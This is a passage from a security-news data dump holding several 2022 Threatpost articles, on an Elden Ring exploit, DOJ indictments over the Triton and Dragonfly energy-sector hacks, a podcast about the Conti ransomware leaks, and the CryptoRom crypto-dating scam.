PvP refers to players being able to interact and duel with each other.\n\n\u201cHopefully the last we\u2019ll see of game invading/save locking/character murdering exploits along these lines,\u201d Boyd explained. \u201cSave points in Souls titles are supposed to be the one safe breathing space in the entire game. To have them corrupted or tampered with and cursed with instant death is probably a bridge too far for even the most hardcore of Souls players.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-24T19:23:12", "type": "threatpost", "title": "Just-Released Dark Souls Game, Elden Ring, Includes Killer Bug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2021-44228"], "modified": "2022-03-24T19:23:12", "id": "THREATPOST:E424D9CD1C692F91FBD97FDDEDBCCE34", "href": "https://threatpost.com/dark-souls-game-elden-ring-killer-bug/179090/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-29T23:16:23", "description": "The U.S. Department of Justice (DOJ) has [indicted](<https://www.justice.gov/opa/pr/four-russian-government-employees-charged-two-historical-hacking-campaigns-targeting-critical>) four Russian government employees in connection to plots to cyber-fry critical infrastructure in the United States and beyond, including at least one nuclear power plant.\n\nThe campaigns involved one of the most dangerous malwares ever encountered in the operational technology and energy sectors: Triton, aka Trisis, a Russia-linked malware used to shut down an oil refinery in 2017 and [another Mideast target](<https://threatpost.com/triton-ics-malware-second-victim/143658/>) in 2019.\n\nTwo related indictments were unsealed yesterday: one that named Evgeny Viktorovich Gladkikh ([PDF](<https://www.justice.gov/opa/press-release/file/1486831/download>)), an employee of the Russian Ministry of Defense, and another ([PDF](<https://www.justice.gov/opa/press-release/file/1486836/download>)) that named three officers in Military Unit 71330 \u2013 or \u201cCenter 16\u201d \u2013 of Russia\u2019s Federal Security Service (FSB), which is the successor to Russia\u2019s KGB.\n\nCenter 16 is the FSB\u2019s main structural unit for signals intelligence, consisting of a central unit housed in unmarked administrative buildings spread across Moscow and secluded forest enclosures, with massive satellite dishes pointing out to listen to the world. 
It\u2019s known by cybersecurity researchers as \u201cDragonfly,\u201d \u201cEnergetic Bear\u201d and \u201cCrouching Yeti.\u201d\n\n## $10M Reward for Intel on FSB Officers\n\nThere\u2019s a reward on the heads of the trio of FSB officers for allegedly hacking a refinery. The State Department [said](<https://www.state.gov/rewards-for-justice-reward-offer-for-information-on-russian-fsb-officers-conducting-malicious-activity-against-u-s-critical-infrastructure-between-2012-2017/>) on Thursday that its Rewards for Justice (RFJ) program is offering $10 million for information on the three, whose names are Pavel Aleksandrovich Akulov, Mikhail Mikhailovich Gavrilov and Marat Valeryevich Tyukov.\n\nThe officers were allegedly involved in computer intrusions, wire fraud, aggravated identity theft and damage to an energy facility. The reward marks the first time that RFJ has named a foreign government security personnel under its critical infrastructure reward offer, the State Department said.\n\n## Triton/Trisis\n\nTriton was allegedly used in campaigns run between May and September 2017.\n\nResearchers have compared Triton\u2019s targeting of industrial control systems (ICS) to malware used in the watershed attacks [Stuxnet](<https://threatpost.com/stuxnets-first-five-victims-provided-path-to-natanz/109291/>) and Industroyer/Crashoverride, the latter of which is a backdoor that targets ICS and which took down the Ukrainian power grid in Kiev in 2016. 
In 2018, research revealed that Industroyer [was linked](<https://threatpost.com/notpetya-linked-to-industroyer-attack-on-ukraine-energy-grid/138287/>) to the massive [NotPetya](<https://threatpost.com/merck-insurance-payout-notpetya-attack/177872/>) ransomware outbreak that crippled organizations around the world the year before.\n\nAccording to the indictment, between May and September 2017, Gladkikh, a 36-year-old computer programmer employed by an institute affiliated with the Russian Ministry of Defense, was involved in a campaign to hack global energy facilities \u201cusing techniques designed to enable future physical damage with potentially catastrophic effects.\u201d The hacking allegedly led to two separate emergency shutdowns at a foreign facility.\n\nAlong with co-conspirators, Gladkikh allegedly hacked the systems of \u201ca foreign refinery\u201d (presumably Saudi oil giant Petro Rabigh) in 2017 and installed Triton/Trisis malware on a safety system produced by Schneider Electric. Triton actually takes its name from the fact that it\u2019s designed to target Triconex safety instrumented system (SIS) controllers, which are sold by Schneider Electric. Triton surfaced again in 2019, when it was again [used to target](<https://threatpost.com/triton-ics-malware-second-victim/143658/>) an undisclosed company in the Middle East.\n\nTriton was designed to prevent the refinery\u2019s safety systems from functioning \u2013 \u201cby causing the ICS to operate in an unsafe manner while appearing to be operating normally,\u201d the DOJ said \u2013 thereby leaving the refinery open to damage and jeopardizing anybody nearby.\n\n\u201cWhen the defendant deployed the Triton malware, it caused a fault that led the refinery\u2019s Schneider Electric safety systems to initiate two automatic emergency shutdowns of the refinery\u2019s operations,\u201d the DOJ said. 
Between February and July 2018, Gladkikh and his crew allegedly researched and (unsuccessfully) tried to hack the computer systems used by a U.S. company with similar refineries.

As energy news outlet E&E News [reported](<https://www.eenews.net/articles/the-inside-story-of-the-worlds-most-dangerous-malware/>) in 2019, in the early evening of Aug. 4, 2017, two emergency shutdown systems sprang to life at Petro Rabigh’s sprawling refinery along Saudi Arabia’s Red Sea coast. Engineers working the weekend shift were oblivious, even as the systems knocked the complex offline “in a last-gasp effort to prevent a gas release and deadly explosion.”

“[They] spotted nothing out of the ordinary, either on their computer screens or out on the plant floor,” according to E&E News.

Gladkikh has been charged with three counts: conspiracy to cause damage to an energy facility, attempt to damage an energy facility, and one count of conspiracy to commit computer fraud.

## FSB Officers’ Indictment: The Dragonfly Supply-Chain Attack

The indictment that names the FSB officers alleges that, between 2012 and 2017, Akulov, Gavrilov, Tyukov and their co-conspirators engaged in computer intrusions, including supply chain attacks, “in furtherance of the Russian government’s efforts to maintain surreptitious, unauthorized and persistent access to the computer networks of companies and organizations in the international energy sector, including oil and gas firms, nuclear power plants, and utility and power transmission companies.”

Specifically, they allegedly targeted the software and hardware that controls equipment in power generation facilities, known as ICS or Supervisory Control and Data Acquisition (SCADA) systems.

“Access to such systems would have provided the Russian government the ability to, among other things, disrupt and damage such computer systems at a future time of its choosing,” according to the
DOJ’s [press release](<https://www.justice.gov/opa/pr/four-russian-government-employees-charged-two-historical-hacking-campaigns-targeting-critical>).

The indictment describes a campaign against the energy sector that involved two phases: The first was a supply-chain attack that was commonly referred to as “Dragonfly” or “Havex” by security researchers. Dragonfly took place between 2012 and 2014 and compromised computer networks of ICS/SCADA system manufacturers and software vendors.

It involved tucking the Havex remote-access trojan (RAT) [inside legitimate software updates](<https://threatpost.com/ics-malware-found-on-vendors-update-installers/106910/>). According to a 2014 advisory from the Industrial Control Systems Cyber Emergency Response Team (ICS-CERT), the Havex RAT targeted vendors via phishing campaigns, website redirects and, finally, by infecting the software installers. Three vendor websites were compromised in watering-hole attacks, the ICS-CERT advisory said.

“After unsuspecting customers downloaded Havex-infected updates, the conspirators would use the malware to, among other things, create backdoors into infected systems and scan victims’ networks for additional ICS/SCADA devices,” according to the DOJ. The gang allegedly managed to install malware on more than 17,000 unique devices in the United States and abroad, including ICS/SCADA controllers used by power and energy companies.

## Dragonfly 2.0: Spearphishing a Nuclear Power Plant

Between 2014 and 2017, the campaign entered into what’s commonly referred to as “Dragonfly 2.0,” wherein the suspects allegedly turned their focus to specific energy sector entities and individuals and engineers who worked with ICS/SCADA systems.

This second phase entailed spearphishing attacks targeting more than 3,300 users at more than 500 U.S. and international companies and entities, in addition to U.S.
government agencies such as the Nuclear Regulatory Commission.

The spearphishing attacks sometimes struck gold, including in the compromise of the business network (i.e., involving computers not directly connected to ICS/SCADA equipment) of the Wolf Creek Nuclear Operating Corporation (Wolf Creek) in Burlington, Kansas. Wolf Creek operates a nuclear power plant.

“Moreover, after establishing an illegal foothold in a particular network, the conspirators typically used that foothold to penetrate further into the network by obtaining access to other computers and networks at the victim entity,” according to the DOJ.

Dragonfly 2.0 also entailed a watering-hole attack wherein the alleged attackers exploited publicly known vulnerabilities in [content management software](<https://threatpost.com/threatlist-wordpress-vulnerabilities/140690/>) (CMS) to compromise servers that hosted websites commonly visited by ICS/SCADA system and other energy sector engineers. “When the engineers browsed to a compromised website, the conspirators’ hidden scripts deployed malware designed to capture login credentials onto their computers,” the DOJ said.

The campaign targeted victims in the United States and in more than 135 other countries, the Feds said.

The FSB officers are looking at charges of conspiracy to cause damage to the property of an energy facility and to commit computer fraud and abuse, and conspiracy to commit wire fraud. Akulov and Gavrilov are also charged with substantive counts of wire fraud and computer fraud related to unlawfully obtaining information from computers and causing damage to computers.
Akulov and Gavrilov are also charged with three counts of aggravated identity theft.

## Still Gaping Security Holes in Energy Companies

LookingGlass CEO Gilman Louie, an expert on national security and cybersecurity who regularly shares or analyzes intel with government agencies, told Threatpost on Friday that legal actions against the potential operators of the critically dangerous Triton malware are welcome: They’re a “positive move [that] sends a strong message to cybercrime and nation-state actors globally,” he said via email.

On the less-positive side, a recent LookingGlass cyber profile of the U.S. energy sector looks grim.

Many energy companies are sitting ducks, with current cybersecurity exposures that have already been exploited by Russian actors in the past, including open ports that enable threat actors to gain full remote access.

The report shares vulnerabilities and exposures that Russian hackers are known to have used. “For years, energy companies have been hammered on securing their operational technology.
The Triton attacks show why this is important,” Louie noted.

But he stated that “organizations also need to ensure they’re improving security on their traditional IT side.” He pointed to the Colonial Pipeline attack as an example of how adversaries “didn’t need in-depth knowledge of [operational technology, or OT] to shut down the flow of gas or oil.”

LookingGlass research shows that, across the energy sector, there are vulnerabilities that are more than 5 years old that haven’t been dealt with, and open ports like remote desktop that are “basically unprotected doors into an organization.”

Energy companies need to be patching or updating their systems and shutting those open doors, Louie said: “If they really need a port open for remote desktop, then they need to add layers of compensating security controls to make sure it’s not easy to exploit.”

When unsealing the indictments, the government noted that it’s taking action to [enhance private sector network defense efforts](<https://www.cisa.gov/uscert/ncas/alerts/aa22-083a>) and to [disrupt similar malicious activity](<https://protect2.fireeye.com/v1/url?k=73f0be82-2c6b867e-73f79a67-ac1f6b01771c-a72e8f7b8ceb667b&q=1&e=d2252912-db07-4b30-8381-4dbd442acfc0&u=https%3A%2F%2Frewardsforjustice.net%2Findex%2F%3Fjsf%3Djet-engine%3Arewards-grid%26tax%3Dcyber%3A857>).

Other security issues that Russian actors have leveraged, which companies need to address immediately before they are used for attacks that could be bigger than those we’ve already seen, include:

 * **Default Passwords**: Exactly what it sounds like. Default passwords are a major attack vector.
Not changing default passwords, especially with a tool like Telnet, leaves companies wide open to Russian access to networks.
 * [**Port 161 – SNMP protocol**](<https://www.cisa.gov/uscert/ncas/alerts/TA18-106A>): The Simple Network Management Protocol (SNMP) uses both port 161 and port 162 for sending commands and messages and is being used by Russia to gain access to network devices and infrastructure. Older versions of this protocol are insecure and allow threat actors to eavesdrop on or manipulate data.
 * **Port 139/445 – SMB:** The SMB network port is commonly used for file sharing. Russian groups have successfully targeted this port to execute remote code and to steal information, LookingGlass found.

These are just a few examples of security exposures that threat actors tied directly to Russia have exploited and will likely exploit again within U.S. companies, according to LookingGlass’s research.

It’s not time to wait for a nuclear-level cyber event, given that threat actors are already inside the power infrastructure. Now’s the time for companies to find and mitigate the holes that let them in, Louie said.

“Energy sector entities should be reviewing their digital footprint and taking action to secure their external-facing assets, especially as the threat of Russian cyberattacks intensifies,” he said.

Source: [DOJ Indicts Russian Gov’t Employees Over Targeting Power Sector](<https://threatpost.com/doj-indicts-russian-govt-employees-over-targeting-power-sector/179108/>), Threatpost, published 2022-03-25.

Information about nuclear plants and air force capabilities.
Conti ransomware gang crooks [conjecturing](<https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-i-evasion/>) that the National Security Agency (NSA) was maybe behind the mysterious, months-long [TrickBot](<https://threatpost.com/trickbot-amazon-paypal-top-brands/178483/>) [lull](<https://threatpost.com/trickbot-break-researchers-scratching-heads/178678/>). [Doxxed data](<https://www.theregister.com/2022/03/02/russian_soldier_leaks/>) about 120K Russian soldiers.

Those are just some of the sensitive, valuable data that’s being hacked out of Russia in the [cyber war zone](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>) – a war that erupted [even before](<https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/>) the country invaded Ukraine.

“Everyone is so focused on Russia hacking the world, but the world has been hacking Russia…. And dumping a lot of critical data on military, nuclear plants, etc.,” said Vinny Troia, cybersecurity Ph.D. and founder of [ShadowByte](<https://shadowbyte.com/>), a dark web threat intelligence and cyber fraud investigations firm.

He’s one of an untold number of experts on dark-web threat intelligence who’ve been poring over the intel that’s been flooding out of practically every nook and cranny of the internet: data that’s being posted on Twitter, Telegram and within the multiple dumps of insider knowledge about the Conti ransomware gang posted by the Ukrainian supporter ContiLeaks.

That ongoing dump, which has included [source code](<https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/>) for Conti and TrickBot, a decryptor (that doesn’t help recent victims whose files have been encrypted by the Conti gang, unfortunately), and much more, stopped yesterday when the Conti gang shut down its Jabber servers, Troia told Threatpost on Wednesday.

He visited the Threatpost podcast to update us on the mountain of data about Russia that intelligence experts are now slogging through.

You can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/030222_Vinny_Troia_mixdown.mp3>). For more podcasts, check out Threatpost’s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>). Also, see below for a lightly edited transcript.

## Lightly Edited Transcript

**Lisa Vaas:** Listeners, welcome to the Threatpost podcast. My guest today is Vinny Troia, cybersecurity PhD and founder of ShadowByte, a dark web threat intelligence and cyber fraud investigations firm. Today, we’re going to focus on all of the data that’s being leaked on Russia as a result of its invasion of Ukraine.

**Lisa Vaas:** Thanks for coming on the podcast. Vinny, before we jump in, could you give us a bit of your background, please?

**Vinny Troia:** Sure. Thanks for having me. Yes. So, my background: I come from a DOD background, did a lot of work for surface deployment command. And yeah, I was there for about, I think, six or seven years before moving over to the private sector.

**Vinny Troia:** And while I was there, I did a lot of work in compliance and random security hacking projects, a lot of red teaming, pen testing. And then eventually I started my own firm.
Fast forward to today, our focus now is primarily dealing with a lot of ransomware cases, incident response, and we do a lot of ransom negotiations as well.

**Vinny Troia:** We’re constantly focused on dark web threat actors and any of the players, really.

**Lisa Vaas:** Thank you for that. And well, this past week must be just a flurry with the dark web activity around Ukraine and Russia. So in an email, you were talking about how everyone is so focused on Russia hacking the world, but the world has been also hacking Russia and dumping a lot of critical data on military, nuclear plants, etc.

**Lisa Vaas:** Where is your intel coming from? Are there any forums in particular that you’re clued into, or is that something you can’t even discuss?

**Vinny Troia:** It’s not even like that. It’s a, I mean, it’s literally everywhere. I mean, there’s Telegram channels. I mean, some is just being pasted right on Twitter.

**Vinny Troia:** I mean, it’s literally coming from all angles at this point.

**Lisa Vaas:** Well, tell me what you’re seeing.

**Vinny Troia:** I’d say last month, there was a lot of data coming out about Ukrainian citizens. I mean, a lot. So that was kind of interesting, almost like a precursor to what was happening.

**Vinny Troia:** And now it’s almost like the rest of the world that’s really pissed and started hacking back, and you’re seeing so much data coming out. I’m actually looking for, sorry, as we speak, I’m going through some of this data. I mean, there’s stuff on nuclear plants, some of their air force capabilities.

**Vinny Troia:** There’s another database that I just recently came across that is about a hundred thousand of their military members with photos, passport numbers, things like that. I mean, it’s really just data coming from all depths of. From other infrastructure,

**Lisa Vaas:** well, who, who, who is the primary sources?

**Lisa Vaas:** I mean, I know that Anonymous of course has jumped in to, to, to wage war on behalf of Ukraine, cyber war on behalf of Ukraine. And I know that you can put out a call for help from cyber experts on this too. So who, who exactly is, is hacking this stuff out of Russia?

**Vinny Troia:** I mean, I, honestly, I couldn’t tell you. I mean, it’s coming, like I said, it’s coming from all sorts of places.

**Vinny Troia:** Right. And when things get leaked, I mean, they just get leaked from various [sources’] usernames on forums or Telegram channels. And so you never really know who it’s coming from. It is interesting that the world kind of banded together against this. And Russia was supposed to have this big cyber arsenal against them.

**Vinny Troia:** And it’s really funny that Joe Biden didn’t mention security once in the State of the Union last night, being that it was such a big deal and everybody’s been talking about it.

**Lisa Vaas:** Yeah. And, and I remember it was NBC News last week, or, or was reporting on the big cyberattacks, the major offensive cyberattacks that were being discussed at the White House, but then the White House denied [considering offensive cyberattacks].

**Vinny Troia:** The news has been all about cyberattacks and Russia’s capabilities and it’s such a priority, but it just wasn’t even mentioned once. I just, I find that really strange, but regardless, it’s nice that the world kind of banded together to really come after Russia. One of the most, honestly, just incredibly fascinating things is all these leaks that have been occurring regarding the Conti ransomware. Yes. And they’re arguably the largest or at least one of the top few largest ransomware groups in the world.
And I mean, they’re just having everything leak: source code, recovery keys, chat logs.

**Vinny Troia:** I mean, as early, as recently as today with the most recent chat logs that came out, so somebody still has access to their servers and I haven’t even had a chance to read the ones from today.

**Lisa Vaas:** I just wrote up the second dump and I didn’t even know there was more posted today. It’s so hard to keep up. Can we talk a little bit about those dumps? Now as I understand it, it’s the decryptor for version two of the Conti Lock ransomware software [that was leaked]. That’s not even going to be usable to anybody because it was for an older version.

**Lisa Vaas:** How is this going to affect Conti? Another one of my sources was telling me that just one of the gang’s groups got hit by this [leak] and everybody else is pretty much doing fine. They’re carrying on business as usual.

**Vinny Troia:** I think what’s really interesting. And they talked about this in one of the, in some of the logs. So Conti uses, or used, this one piece of software called TrickBot in order to disseminate and … one of the or groupings of the chat log showed that the NSA came after TrickBot specifically.

**Vinny Troia:** I don’t know whether or not they reverse engineered or what they did, but I mean, they were able to shut it down for a couple of weeks just by changing patch numbers and uploading them to a server that would accept the changes. And so what they did was they maxed out the maximum patch number.

**Vinny Troia:** The software couldn’t take any new updates at that point. So they effectively shut it down for a little bit. That was actually really amazing.

**Lisa Vaas:** I totally missed that. Which repository was that in? What’s the name of the repository?

**Vinny Troia:** It’s all JSON files.

**Lisa Vaas:** Everybody knew that TrickBot pretty much shut down for a few months, but I didn’t know that about the NSA piece.

**Vinny Troia:** It’s presumed to be the NSA, given the level of skill that was involved, we’ll call it finesse. I would say it would have to be some government agency.

**Lisa Vaas:** Was there chatter about the shutdown?

**Vinny Troia:** Yeah, it’s basically a handful of officials talking about it and how they were shut down and how they basically had to rebuild their infrastructure.

**Vinny Troia:** They were down for a little bit and eventually they came back, but it just shows that they were being targeted by nation states. I think the most interesting thing is, if this really is a Russian operated group, which is what it seems like, then the fact that all these files are being leaked, whether it’s from an insider or somebody who’s a researcher who’s attacking them specifically, I think this is going to have a major toll on Russia’s finances, especially considering this is a group that is averaging what, a couple hundred million dollars a year recurring revenue?

**Lisa Vaas:** I don’t expect you to know this, but maybe you do: How much of Russia’s economy is actually coming from ransomware or other malware?

**Vinny Troia:** I think the majority, actually. So I think the majority of Russia’s economy is coming from some sort of crime. There’s not a whole lot going on over there. It’s like a big wasteland.

**Lisa Vaas:** Right. The underground members say “protect the motherland, the motherland protects you.” Except for when they need some stooges to arrest, some low-level stooges to make the U.S. happy, which happened recently.

**Vinny Troia:** As far as the decryptor [goes], you’re correct. It is for an older version.
I think I saw some keys floating around as well, but new code is written on top of old code and it’s not like it was replaced completely. So I would imagine that there will be some fallout from that code base.

**Lisa Vaas:** Yeah, there’s a lot of code to go through, I hear. So what were some other really great finds in the intelligence that we’re getting out of Russia during this crisis?

**Vinny Troia:** It’s information on citizens, it’s information on military members. I’ve seen things on nuclear plants. I can’t speak to what can be done with all of it, honestly, but the point is it’s there and, in the right hands, I’m sure it could be pretty useful.

**Lisa Vaas:** I assume, during these days, it’s just not going to let up.

**Vinny Troia:** No, and like I said, a couple of hours ago we had more leaks from their Jabber server. So I would imagine whoever has access has been able to pull off a lot, and I think [Conti] actually just shut it down finally.

**Lisa Vaas:** So that means they shut down Jabber. That doesn’t mean that they figured out who the leaker is. Right?

**Vinny Troia:** The person leaking it goes by [ContiLeaks]. But whether or not he’s the one with access, I don’t know. But the point is they figured out that somebody did have access to their Jabber logs. So now they’ve moved servers.

**Lisa Vaas:** Well, awesome. What else can you tell listeners? What can you leave us with?

**Vinny Troia:** I would say that, just because Conti’s out doesn’t mean that the problem is going away anytime soon. So be diligent and keep up with your passwords and make sure that you actually have fresh passwords, because looking at these logs and how they’re getting into a lot of these systems, it’s just using other people’s recycled passwords.

**Vinny Troia:** The hacks they’re using aren’t even that sophisticated. And I mean, even now the majority of hacks are still caused by reused passwords.

**Lisa Vaas:** We can get some intelligence out of the exploits that they’re targeting. I think I saw Zerologon was mentioned as one, and of course we know a lot about their tooling right now. Like the whole Cobalt Strike beacon thing.

**Vinny Troia:** Cobalt Strike’s been a red teaming tool forever. It’s a staple. For pen testers, it’s an amazing tool. And so the fact that they were using it isn’t really a surprise.

**Lisa Vaas:** Well, is there anything surprising that was found in the dumps? I know that we’ve got email addresses of some of the members of the gang.

**Vinny Troia:** You can use that to look for other accounts and potentially start to reverse back to maybe who they are. But I mean, there’s so much information here. I haven’t even gone through maybe a 10th of it. It’s coming up too fast. It’s a full-time job. It takes a full-time team at this point to go through all of this. Because then there was another thing that came out: Rocket.Chat logs from a Rocket.Chat. There’s thousands of logs here.

**Lisa Vaas:** Yeah, that’s pretty bad. When you’ve got a researcher, an intel expert who says he’s getting too much: The firehose is open so wide. So the takeaways for listeners are that these leaks haven’t stopped, and we don’t even know how many that [ContiLeaks] is promising.

**Vinny Troia:** I mean, the fact that today’s leaks caused the shutdown, I presume caused a shutdown of their Jabber server. I’m going to say that well has pretty much run dry. I don’t know what else is going to be released in terms of tools, but I’d say all of this has probably put a dent in everything they’re doing for a little bit.

**Lisa Vaas:** We can hope so, but I don’t think we should assume anything.
And that’s what you’re telling us: They’re still going to be active and they’re going to retool anyway. Right. And will resurface.

**Vinny Troia:** Yeah. I was going to say, giving credit to [security journalist Brian] Krebs on this one, one of the things he reported on was that there was a conversation, and I haven’t even made it to the set, about how the ransomware groups were being investigated.

**Vinny Troia:** And someone high up in the group basically told them they didn’t have anything to worry about. The investigation was going to go off of them. And that was right around the time that Russia took down REvil. So it was interesting. It’s almost like they had insider information, or maybe they literally were working for [Russia].

**Lisa Vaas:** I think REvil, that takedown, was the one I was thinking about when I alluded to this kind of token law enforcement action on Russia’s part to maybe make the U.S. shut up. Now I have to go read Brian Krebs. Why didn’t I read Brian Krebs earlier today? I have to do that. That’s like a requirement of the job. OK, well, Vinny, unless you’ve got anything else to add, I’m going to let you go.

**Vinny Troia:** No, all good.

**Lisa Vaas:** I appreciate it. Thank you so much. Thanks for coming on the podcast.

030322 10:49 UPDATE: ContiLeaks, the source of the Conti leaks, is not believed to be the same entity as vx_underground, which has disseminated the leaked files.

Source: [Russia Leaks Data From a Thousand Cuts–Podcast](<https://threatpost.com/russia-leaks-data-thousand-cuts-podcast/178749/>), Threatpost, published 2022-03-03.

For about a year now, crypto-traders and lovelorn singles alike have been losing their money to CryptoRom, a malware campaign that combines catfishing with crypto-scamming.

According to [research](<https://news.sophos.com/en-us/2022/03/16/cryptorom-bitcoin-swindlers-continue-to-target-vulnerable-iphone-and-android-users/>) from Sophos, CryptoRom’s perpetrators have now improved their techniques.
They’re leveraging new iOS features – [TestFlight](<https://developer.apple.com/testflight/>) and [WebClips](<https://support.apple.com/guide/deployment/%22>) – to get fake apps onto victims’ phones without being subject to the rigorous app store approval process.

Successful CryptoRom scams have resulted in five-, six- and even seven-figure losses for victims.

## What is CryptoRom?

We do silly things when we’re in love. In fact, [scientifically speaking](<https://link.springer.com/article/10.1007/s10508-015-0589-y>), our inhibitions and decision-making capabilities become impaired in the face of romance and sexual arousal.

Perhaps that’s why hackers have been so successful in targeting dating apps over the years. Last year, the Federal Trade Commission [reported](<https://consumer.ftc.gov/articles/what-you-need-know-about-romance-scams#:~:text=Romance%20scams%20reached%20a%20record,%2C%20Facebook%2C%20or%20Google%20Hangouts.>) that “romance scams” cost U.S. citizens over 300 million dollars in 2020, up 50 percent from 2019.

Capitalizing on this trend, last year a new and well-coordinated campaign began targeting users of dating apps like Bumble, Tinder and Grindr. According to a Sophos [report](<https://news.sophos.com/en-us/2021/10/13/cryptorom-fake-ios-cryptocurrency-apps/>) last fall, the attackers’ M.O. is to begin there, then move the conversation to messaging apps.

“Once the victim becomes familiar, they ask them to install fake trading applications with legitimate looking domains and customer support,” researchers explained.

The trading apps tend to be cryptocurrency-related, since, more so than with fiat currency, cryptocurrency payments are [irreversible](<https://www.uschamber.com/co/run/finance/accepting-cryptocurrency-as-payment#:~:text=Cryptocurrency%20transactions%20are%20irreversible&text=%E2%80%9CTransactions%20can%20be%20refunded%20only,has%20paid%2C%E2%80%9D%20wrote%20Inc.>).

“They move the conversation to investment and ask them to invest a small amount, and even let them withdraw that money with profit as bait,” according to Sophos. “After this, they will be told to buy various financial products or asked to invest in special ‘profitable’ trading events. The new friend even lends some money into the fake app, to make the victim believe they’re real and caring. When the victim wants their money back or gets suspicious, they get locked out of the account.”

The ruse can go on quite a while before victims catch on. One anonymous person told Sophos that they lost more than $20,000, while another complained of investing $100,000 into the fake app and unwittingly bringing a brother and friends into the scheme.

In the worst case thus far, one user wrote that “I have invested all my retirement money and loan money, about $1,004,000.
I had no idea that they would freeze my account, requiring me to pay $625,000, which is 20 percent taxes on the total profits before they will unfreeze my account.\u201d\n\nKarl Steinkamp, director at Coalfire, told Threatpost that the scam is a perfect storm of social engineering.\n\n\u201cAn overarching theme here is twofold: One, we are seeing the world\u2019s population rapidly wanting to adopt some format of crypto assets, whether this is Bitcoin, Ethereum or any one of the other 17K+ altcoins,\u201d he said. \u201cAnd two, there is an increasing need for end user (and company) security awareness training when utilizing, storing and transferring any crypto asset. Crypto and digital-asset protection includes different technologies and skills needed to adequately secure the resources.\u201d\n\nHe added, \u201cThe mixing of dating, money / lending, and social-engineering efforts is and will continue to be a potent combination for bad actors to continue to steal money from victims. Bad actors only need to find one crack in the armor, while individuals and companies need to protect against every avenue of threats.\u201d\n\n## What\u2019s New This Time?\n\nA crucial component to the CryptoRom attack flow is those fake apps. Victims might receive a link to download what purports to be BTCBOX, for example, or Binance \u2013 perfectly legitimate cryptocurrency trading platforms. These apps appear to have professional user interfaces, and even come with customer-service chat options.\n\nApple and Google apply strict vetting to weed out malicious mobile apps like these from their official stores. But, as Threatpost has [covered before](<https://threatpost.com/teabot-trojan-haunts-google-play-store/178738/>), hackers have clever tricks to get around conventional security testing. 
In the past, for example, CryptoRom\u2019s preferred method was to use [the Apple Developer Program and Enterprise Signatures](<https://threatpost.com/cryptorom-scammers-apple-enterprise-features/175474/>).\n\nNow, CryptoRom is taking advantage of two new iOS features.\n\nThe first, TestFlight, is a feature developers can use to distribute beta versions of their apps to testers.\n\n\u201cUnfortunately,\u201d wrote the researchers, \u201cjust as we\u2019ve seen happen with other alternative app distribution schemes supported by Apple, \u2018TestFlight Signature\u2019 is available as a hosted service for alternative iOS app deployment, making it all too simple for malware authors to abuse.\u201d\n\nCryptoRom has shifted from Enterprise Signatures towards TestFlight Signatures because, wrote Sophos, \u201cit is a bit cheaper\u201d \u2013 requiring only an .IPA file with a compiled iOS app. Apps also look \u201cmore legitimate when distributed with the Apple Test Flight App,\u201d researchers added. \u201cThe review process is also believed to be less stringent than App Store review.\u201d\n\n\u201cHackers leveraging Apple\u2019s TestFlight platform as a distribution mechanism for malicious apps is a clever \u2014 and relatively simple \u2014 tactic that can certainly lead to problems for victims,\u201d Ray Kelly, fellow at NTT Application Security, told Threatpost. \u201cUsers should understand that side-loading applications is always a precarious proposition. Apps that are downloaded and installed outside of the App Store or Google Play ecosystem have not been vetted for security and privacy risks, leaving the door wide open for attackers to compromise users\u2019 personal data and sometimes, their financial accounts.\u201d\n\nEven more so than TestFlight, CryptoRom attackers have been using WebClips, a feature that allows web links to be added to the iOS home screen like regular apps. 
Malicious WebClips mimic real apps like RobinHood (in the following case, \u201cRobinHand\u201d).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/16132308/RobinHand.png>)\n\nA malicious WebClip offering in the Apple App Store. Source: Sophos.\n\n\u201cIn addition to App Store pages, all these fake pages also had linked websites with similar templates to convince users,\u201d the researchers wrote. \u201cThis shows how cheap and easy it is to mimic popular brands while siphoning thousands of dollars from victims.\u201d\n\nSince it\u2019s almost impossible for law enforcement to crack down on any one individual scam, app store providers have a responsibility to monitor for misuse of these developer tools, Mark Lambert, vice president of products at ArmorCode, told Threatpost. He added, \u201cUltimately, however, the problem is a lack of security awareness. It is essential that users look for things that \u2018don\u2019t look right\u2019 and have a fundamental view of not trusting electronic communications or taking them on face value.\u201d\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists. 
